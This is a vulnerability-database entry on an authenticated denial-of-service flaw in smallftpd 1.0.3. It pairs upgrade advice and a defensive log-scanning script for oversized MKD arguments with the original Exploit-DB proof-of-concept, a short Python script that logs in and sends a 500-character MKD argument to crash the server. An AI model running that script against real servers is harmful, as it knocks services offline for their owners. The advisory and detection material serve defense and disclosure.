vendor: smallftpd
by: Greg Priest
CVSS: 7,5 HIGH
Denial of Service (DoS)
CWE: 400
Product Name: smallftpd
Affected Version From: 1.0.3
Affected Version To: 1.0.3
Patch Exists: YES
Related CWE: N/A
CPE: smallftpd
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows XP, Windows 7 x64
2016

smallftp_mkd_command_DoS_Exploit

This exploit targets smallftpd 1.0.3. An attacker sends a large string of characters as the argument to the MKD command, which causes the server to crash. The attacker must have valid credentials to the FTP server in order to exploit this vulnerability.

Mitigation:

The best way to mitigate this vulnerability is to upgrade to the latest version of smallftpd, which has been patched to prevent this type of attack.
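
Where an upgrade cannot be applied right away, the over-long MKD argument described above can be spotted in FTP control-channel logs. The following is an added example, not part of the original advisory or the Exploit-DB code; the log line format, the 255-character limit and the name `find_oversized_mkd` are assumptions.

```python
import re

# Assumed limit: no legitimate directory name here exceeds 255 characters.
MAX_ARG_LEN = 255
# Constructed log format: "<session> <C|S>: <FTP control-channel line>"
LINE_RE = re.compile(r"^(?P<sid>\S+) (?P<dir>[CS]): (?P<msg>.*)$")


def find_oversized_mkd(lines, max_len=MAX_ARG_LEN, commands=("MKD",)):
    """Return alerts for over-long arguments to the given commands.

    Each alert is (session, user, command, arg_length, authenticated).
    """
    sessions = {}  # sid -> {"user": str or None, "authed": bool}
    alerts = []
    for raw in lines:
        m = LINE_RE.match(raw.rstrip("\r\n"))
        if not m:
            continue  # ignore lines that are not in the expected format
        state = sessions.setdefault(m["sid"], {"user": None, "authed": False})
        msg = m["msg"]
        if m["dir"] == "S":
            # 230 = user logged in (RFC 959)
            if msg.startswith("230"):
                state["authed"] = True
            continue
        verb, _, arg = msg.partition(" ")
        verb = verb.upper()
        if verb == "USER":
            # A new USER command restarts authentication for the session
            state["user"], state["authed"] = arg, False
        elif verb in commands and len(arg) > max_len:
            alerts.append((m["sid"], state["user"], verb, len(arg), state["authed"]))
    return alerts


# Constructed sample: s1 creates a normal directory, s2 sends a 500-character argument.
SAMPLE_LOG = [
    "s1 C: USER alice", "s1 S: 331 Password required", "s1 C: PASS ***",
    "s1 S: 230 User logged in", "s1 C: MKD reports", "s1 S: 257 created",
    "s2 C: USER bob", "s2 S: 331 Password required", "s2 C: PASS ***",
    "s2 S: 230 User logged in", "s2 C: MKD " + "A" * 500,
]

if __name__ == "__main__":
    for alert in find_oversized_mkd(SAMPLE_LOG):
        print("oversized argument: session=%s user=%s cmd=%s len=%d authed=%s" % alert)
```

Because the attack requires a valid login, the `user` field in each alert identifies the account to review or disable.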
Source

Exploit-DB raw data:

from ftplib import FTP

print '''
                ##############################################
                #    Created: ScrR1pTK1dd13                  #
                #    Name: Greg Priest                       #
                #    Mail: ScrR1pTK1dd13.slammer@gmail.com   # 
                ##############################################


# Exploit Title: smallftp_mkd_command_DoS_Exploit
# Date: 2016.10.26
# Exploit Author: Greg Priest
# Version: smallftpd 1.0.3
# Tested on: Windows XP, Windows 7 x64

'''

ftp_ip = raw_input("FTP server IP:")
user = raw_input("username:")
password = raw_input("password:")
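# Oversized MKD argument: 'CRASH' repeated 100 times (500 characters)
killercode = 'CRASH' * 100
ftp = FTP(ftp_ip)
# Valid credentials are required; print the server's login response
print ftp.login(user, password)
print "CRASH CODE SENT!"
# The MKD command carrying the oversized argument is what crashes the server
ftp.mkd(killercode)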